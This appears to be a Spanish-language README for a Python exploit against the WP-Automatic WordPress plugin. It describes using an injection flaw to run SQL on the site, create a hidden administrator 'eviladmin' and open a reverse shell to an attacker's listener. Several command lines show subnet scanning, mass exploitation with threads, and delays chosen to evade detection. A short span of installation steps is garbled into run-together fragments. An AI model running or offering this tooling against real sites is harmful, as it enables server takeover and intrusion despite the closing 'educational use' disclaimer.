Este script de Python automatiza el proceso de crear una nueva cuenta de administrador en un sitio de WordPress y ejecutar un shell inverso en el servidor de destino. Utiliza la vulnerabilidad de inyección CSV del complemento Automático WP-Automático para ejecutar consultas SQL en la base de datos de WordPress y obtener acceso administrativo.
Escaneo de una subred : si desea escanear una subred para instalaciones vulnerables de WordPress, puede usar la opción --subnet . Por ejemplo:
python wp-automatic-exploit.py --subnet 192.168.1.0/24 --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 1.0
Este comando escaneará la subred 192.168.1.0/24 para sitios de WordPress con el complemento automático WP vulnerable e intentará explotarlos utilizando la configuración del oyente proporcionada.
Personalización del retraso : el retraso entre las solicitudes se puede ajustar utilizando la opción --delay . Un retraso más alto puede ayudar a evitar la detección o la limitación de la velocidad, mientras que un retraso más bajo puede acelerar el proceso de explotación. Por ejemplo:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 2.5
Este comando utilizará un retraso de 2.5 segundos entre solicitudes.
Usando un oyente remoto : si su oyente está configurado en una máquina remota, puede especificar su dirección IP y puerto utilizando las opciones --lhost y --lport . Por ejemplo:
python wp-automatic-exploit.py --targets targets.txt --lhost 192.168.1.100 --lport 8080 --threads 10 --delay 1.0
Este comando se conectará a un oyente el 192.168.1.100:8080 .
Aumento del número de subprocesos : puede aumentar el número de hilos utilizados por el script con la opción --threads . Esto puede acelerar el proceso de explotación, pero también puede aumentar la probabilidad de detección o causar problemas con la limitación de la tasa. Por ejemplo:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 20 --delay 1.0
Este comando usará 20 hilos para la explotación.
requests (instalar a través de pip install requests )domain en el script con la URL del sitio de WordPress de destino.eviladmin , establecerá la contraseña y asignará privilegios administrativos.Nota: Asegúrese de tener autorización y permisos adecuados antes de ejecutar este script, ya que puede conducir a vulnerabilidades de seguridad y consecuencias legales si se usa incorrectamente.
Este guión se proporciona solo para fines educativos y de prueba. El autor no asume ninguna responsabilidad por ningún uso no autorizado o ilegal de este script. Úselo bajo su propio riesgo.